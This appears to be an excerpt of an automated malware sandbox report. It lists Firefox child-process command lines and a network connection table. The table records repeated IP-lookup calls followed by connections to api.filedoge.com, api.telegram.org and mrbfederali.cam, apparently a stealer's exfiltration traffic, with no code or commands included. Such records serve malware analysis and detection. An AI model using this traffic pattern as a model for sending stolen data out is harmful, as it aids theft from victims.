"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.9.1142723999\537138823" -childID 8 -isForBrowser -prefsHandle 6424 -prefMapHandle 6420 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b3d817d-904e-4cf2-9022-3722438ae352} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6432 21867eb3958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.10.577266884\2139491012" -childID 9 -isForBrowser -prefsHandle 4872 -prefMapHandle 5164 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ecaf769-7fd3-4d1b-a7fd-df969765243f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6092 218678aee58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.11.1882175982\1875369577" -childID 10 -isForBrowser -prefsHandle 6100 -prefMapHandle 6120 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6481f5a1-52ec-456a-9b3d-b3d6f9b100f4} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1380 2185d333e58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.12.537696255\2011888696" -childID 11 -isForBrowser -prefsHandle 10660 -prefMapHandle 10648 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae7021ad-ee51-4aa5-997a-ded1e94e61e0} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 10664 21864f8ed58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.13.825371457\626011255" -childID 12 -isForBrowser -prefsHandle 10336 -prefMapHandle 10328 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc5c2dac-3d62-4472-a6f7-67b3362dc8d5} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 10344 21867cbfa58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.14.1760758338\24432413" -childID 13 -isForBrowser -prefsHandle 4324 -prefMapHandle 6032 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {711f6e68-28ee-43e7-9c96-2f95e2a4bc78} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6224 2185d331158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.15.1370978413\1158419792" -childID 14 -isForBrowser -prefsHandle 4928 -prefMapHandle 10504 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b1818ac-09ac-498e-83f4-0e7554657154} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6424 2185d332058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.16.479201886\1345818582" -childID 15 -isForBrowser -prefsHandle 6092 -prefMapHandle 10460 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9a27e29-75d9-492c-a88d-889a94861ff9} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 9928 218608cbb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.17.563355609\693325475" -childID 16 -isForBrowser -prefsHandle 6036 -prefMapHandle 4824 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f4ec1e0-9195-4f11-8f75-3cd69345557d} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6168 21867eb2d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.18.554141052\1468241636" -childID 17 -isForBrowser -prefsHandle 5904 -prefMapHandle 10304 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9977f278-853c-40a7-adc9-009ff6630eca} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 9888 21867eb4858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.19.1986547475\1769153122" -childID 18 -isForBrowser -prefsHandle 11008 -prefMapHandle 11044 -prefsLen 31299 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8da9614b-87bf-432b-bcf3-270cc69dc33b} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 11020 2186e03b658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.20.955464574\90668214" -childID 19 -isForBrowser -prefsHandle 11240 -prefMapHandle 11248 -prefsLen 31299 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51d7d574-d6b5-4430-bbb8-28c4796fd21a} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 11024 2186e067458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.21.117201389\1211368958" -childID 20 -isForBrowser -prefsHandle 10012 -prefMapHandle 10028 -prefsLen 31299 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd0e1ec7-6b2f-439f-bfc4-9b7392746313} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 10008 21866323958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.22.1425546929\837102885" -childID 21 -isForBrowser -prefsHandle 10048 -prefMapHandle 10060 -prefsLen 31308 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de295e9f-d2da-4bc2-9404-4356f0e5ad5a} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 9800 2185d430558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.23.69807367\257329591" -childID 22 -isForBrowser -prefsHandle 11036 -prefMapHandle 11116 -prefsLen 31308 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59208cbf-f280-40ac-9796-157c1a774262} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 11100 218679c7d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.24.1380787942\849734236" -childID 23 -isForBrowser -prefsHandle 6008 -prefMapHandle 10476 -prefsLen 31308 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb5f87da-546d-448d-aa0b-147b1fcec16d} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 9848 21867a44e58 tab
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| DE | 49.13.193.134:443 | api.filedoge.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.101.63.23.in-addr.arpa | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 34.117.118.44:443 | www.myexternalip.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 172.67.205.179:443 | mrbfederali.cam | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:49866 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:49982 | tcp | |
| N/A | 127.0.0.1:50002 | tcp | |
| N/A | 127.0.0.1:50021 | tcp | |
| N/A | 127.0.0.1:50041 | tcp | |
| N/A | 127.0.0.1:50061 | tcp | |
| N/A | 127.0.0.1:50081 | tcp | |
| N/A | 127.0.0.1:50100 | tcp | |
| N/A | 127.0.0.1:50120 | tcp | |
| N/A | 127.0.0.1:50165 | tcp | |
| N/A | 127.0.0.1:50197 | tcp | |
| N/A | 127.0.0.1:50220 | tcp | |
| N/A | 127.0.0.1:50240 | tcp | |
| N/A | 127.0.0.1:50265 | tcp | |
| N/A | 127.0.0.1:50285 | tcp | |
| N/A | 127.0.0.1:50307 | tcp | |
| N/A | 127.0.0.1:50327 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:50361 | tcp | |
| N/A | 127.0.0.1:50381 | tcp | |
| N/A | 127.0.0.1:50401 | tcp | |
| N/A | 127.0.0.1:50421 | tcp | |
| N/A | 127.0.0.1:50441 | tcp | |
| N/A | 127.0.0.1:50461 | tcp | |
| N/A | 127.0.0.1:50481 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50532 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| DE | 49.13.193.134:443 | api.filedoge.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 34.117.118.44:443 | www.myexternalip.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:50636 | tcp | |
| US | 172.67.205.179:443 | mrbfederali.cam | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50660 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50673 | tcp | |
| N/A | 127.0.0.1:50692 | tcp | |
| N/A | 127.0.0.1:50742 | tcp | |
| N/A | 127.0.0.1:50766 | tcp | |
| N/A | 127.0.0.1:50791 | tcp | |
| N/A | 127.0.0.1:50812 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:50833 | tcp | |
| N/A | 127.0.0.1:50852 | tcp | |
| N/A | 127.0.0.1:50871 | tcp | |
| N/A | 127.0.0.1:50890 | tcp | |
| N/A | 127.0.0.1:50909 | tcp | |
| N/A | 127.0.0.1:50928 | tcp | |
| N/A | 127.0.0.1:50947 | tcp | |
| N/A | 127.0.0.1:50955 | tcp | |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.120.5.221:443 | prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 44.237.65.238:443 | shavar.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | udp |
| N/A | 127.0.0.1:50961 | tcp | |
| US | 216.239.32.21:80 | virustotal.com | tcp |
| US | 216.239.32.21:443 | virustotal.com | tcp |
| US | 8.8.8.8:53 | 21.32.239.216.in-addr.arpa | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| GB | 142.250.180.3:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | 46.34.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.200.35:443 | recaptcha.net | tcp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.200.35:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | bit.ly | udp |
| US | 67.199.248.10:80 | bit.ly | tcp |
| US | 67.199.248.10:80 | bit.ly | tcp |
| US | 8.8.8.8:53 | bit.ly | udp |
| US | 8.8.8.8:53 | bit.ly | udp |
| US | 67.199.248.15:443 | bitly.com | tcp |
| US | 8.8.8.8:53 | bitly.com | udp |
| US | 67.199.248.15:443 | bitly.com | udp |
| US | 8.8.8.8:53 | docrdsfx76ssb.cloudfront.net | udp |
| BE | 92.123.50.203:443 | cdn.optimizely.com | tcp |
| US | 3.165.112.128:443 | docrdsfx76ssb.cloudfront.net | tcp |
| US | 8.8.8.8:53 | e5048.dsca.akamaiedge.net | udp |
| US | 3.165.112.128:443 | docrdsfx76ssb.cloudfront.net | tcp |
| US | 3.165.112.128:443 | docrdsfx76ssb.cloudfront.net | tcp |
| US | 3.165.112.128:443 | docrdsfx76ssb.cloudfront.net | tcp |
| US | 3.165.112.128:443 | docrdsfx76ssb.cloudfront.net | tcp |
| US | 3.165.112.128:443 | docrdsfx76ssb.cloudfront.net | tcp |
| US | 8.8.8.8:53 | docrdsfx76ssb.cloudfront.net | udp |
| US | 8.8.8.8:53 | docrdsfx76ssb.cloudfront.net | udp |
| US | 8.8.8.8:53 | e5048.dsca.akamaiedge.net | udp |
| US | 8.8.8.8:53 | 15.248.199.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.248.199.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.112.165.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.50.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | use.typekit.net | udp |
| US | 104.19.178.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| SE | 184.31.15.40:443 | use.typekit.net | tcp |
| SE | 184.31.15.40:443 | use.typekit.net | tcp |
| SE | 184.31.15.40:443 | use.typekit.net | tcp |
| US | 8.8.8.8:53 | a1988.dscg1.akamai.net | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | a1988.dscg1.akamai.net | udp |
| US | 104.19.178.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | 52.178.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 98.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | jsdelivr.map.fastly.net | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 151.101.1.229:443 | jsdelivr.map.fastly.net | udp |
| US | 8.8.8.8:53 | sp.bitly.com | udp |
| US | 34.120.78.44:443 | sp.bitly.com | tcp |
| US | 34.120.78.44:443 | sp.bitly.com | tcp |
| US | 8.8.8.8:53 | sp.bitly.com | udp |
| US | 8.8.8.8:53 | sp.bitly.com | udp |
| US | 34.120.78.44:443 | sp.bitly.com | udp |
| US | 8.8.8.8:53 | public.profitwell.com | udp |
| US | 8.8.8.8:53 | js-eu1.hs-scripts.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 12389169.fls.doubleclick.net | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.78.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | dna8twue3dlxq.cloudfront.net | udp |
| FR | 18.155.129.23:443 | dna8twue3dlxq.cloudfront.net | tcp |
| US | 172.65.208.22:443 | js-eu1.hs-scripts.com | tcp |
| US | 8.8.8.8:53 | 2acdb9b66bb242618283aadb21ede6c1.pacloudflare.com | udp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| US | 8.8.8.8:53 | snap.licdn.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| GB | 216.58.204.70:443 | 12389169.fls.doubleclick.net | tcp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| GB | 142.250.187.206:443 | analytics.google.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 2acdb9b66bb242618283aadb21ede6c1.pacloudflare.com | udp |
| US | 8.8.8.8:53 | dna8twue3dlxq.cloudfront.net | udp |
| US | 8.8.8.8:53 | cdn3.optimizely.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | a16488430484.cdn.optimizely.com | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 104.68.82.206:443 | a16488430484.cdn.optimizely.com | tcp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 142.250.187.206:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | platform.twitter.map.fastly.net | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 199.232.56.157:443 | platform.twitter.map.fastly.net | tcp |
| US | 2.17.251.25:443 | snap.licdn.com | tcp |
| GB | 163.70.151.21:443 | scontent.xx.fbcdn.net | tcp |
| US | 3.165.113.121:443 | static.hotjar.com | tcp |
| GB | 23.64.33.30:443 | cdn3.optimizely.com | tcp |
| US | 8.8.8.8:53 | js-eu1.hs-banner.com | udp |
| US | 8.8.8.8:53 | js-eu1.hs-analytics.net | udp |
| US | 8.8.8.8:53 | a1916.dscg2.akamai.net | udp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | platform.twitter.map.fastly.net | udp |
| US | 8.8.8.8:53 | a1916.dscg2.akamai.net | udp |
| US | 172.65.238.60:443 | js-eu1.hs-analytics.net | tcp |
| US | 172.65.202.201:443 | js-eu1.hs-banner.com | tcp |
| US | 8.8.8.8:53 | cdn3.optimizely.com | udp |
| US | 8.8.8.8:53 | e4343.a.akamaiedge.net | udp |
| US | 8.8.8.8:53 | static-cdn.hotjar.com | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | e4343.a.akamaiedge.net | udp |
| GB | 163.70.151.21:443 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | 18ea70d2d9a945cfb97d818ba71817dc.pacloudflare.com | udp |
| US | 8.8.8.8:53 | 7c7b02d4bc3d48dd81a7c7738d4de1ab.pacloudflare.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | analytics.twitter.com | udp |
| BE | 74.125.71.156:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | s.twitter.com | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| US | 8.8.8.8:53 | s.twitter.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | track-eu1.hubspot.com | udp |
| US | 8.8.8.8:53 | l-0005.l-msedge.net | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 8.8.8.8:53 | e5de3d23065c4748b155c28e6fa36f3e.pacloudflare.com | udp |
| US | 8.8.8.8:53 | l-0005.l-msedge.net | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| US | 8.8.8.8:53 | e5de3d23065c4748b155c28e6fa36f3e.pacloudflare.com | udp |
| BE | 74.125.71.156:443 | stats.g.doubleclick.net | udp |
| US | 104.244.42.67:443 | s.twitter.com | tcp |
| US | 13.107.42.14:443 | l-0005.l-msedge.net | tcp |
| FR | 18.164.52.95:443 | script.hotjar.com | tcp |
| US | 172.65.240.166:443 | e5de3d23065c4748b155c28e6fa36f3e.pacloudflare.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| US | 8.8.8.8:53 | 22.208.65.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.129.155.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.82.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.56.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.113.165.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.33.64.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.238.65.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.202.65.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.71.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.240.65.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.52.164.18.in-addr.arpa | udp |
| GB | 163.70.151.35:443 | star-mini.c10r.facebook.com | tcp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| US | 8.8.8.8:53 | logx.optimizely.com | udp |
| GB | 163.70.151.35:443 | star-mini.c10r.facebook.com | udp |
| US | 34.49.241.189:443 | logx.optimizely.com | tcp |
| US | 8.8.8.8:53 | logx.optimizely.com | udp |
| US | 34.49.241.189:443 | logx.optimizely.com | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.241.49.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | js.qualified.com | udp |
| US | 104.18.16.5:443 | js.qualified.com | tcp |
| US | 8.8.8.8:53 | js.qualified.com | udp |
| US | 8.8.8.8:53 | js.qualified.com | udp |
| US | 8.8.8.8:53 | ws.qualified.com | udp |
| US | 8.8.8.8:53 | 5.16.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lit-wildwood-9179.fathomless-lake-7710.herokuspace.com | udp |
| US | 54.163.161.109:443 | lit-wildwood-9179.fathomless-lake-7710.herokuspace.com | tcp |
| US | 8.8.8.8:53 | lit-wildwood-9179.fathomless-lake-7710.herokuspace.com | udp |
| US | 34.49.241.189:443 | logx.optimizely.com | udp |
| US | 8.8.8.8:53 | app.qualified.com | udp |
| US | 44.206.84.28:443 | dry-bastion-1897.fathomless-lake-7710.herokuspace.com | tcp |
| US | 8.8.8.8:53 | dry-bastion-1897.fathomless-lake-7710.herokuspace.com | udp |
| US | 8.8.8.8:53 | assets.qualified.com | udp |
| US | 8.8.8.8:53 | 109.161.163.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.84.206.44.in-addr.arpa | udp |
| US | 104.18.17.5:443 | assets.qualified.com | tcp |
| US | 8.8.8.8:53 | assets.qualified.com | udp |
| US | 104.18.17.5:443 | assets.qualified.com | tcp |
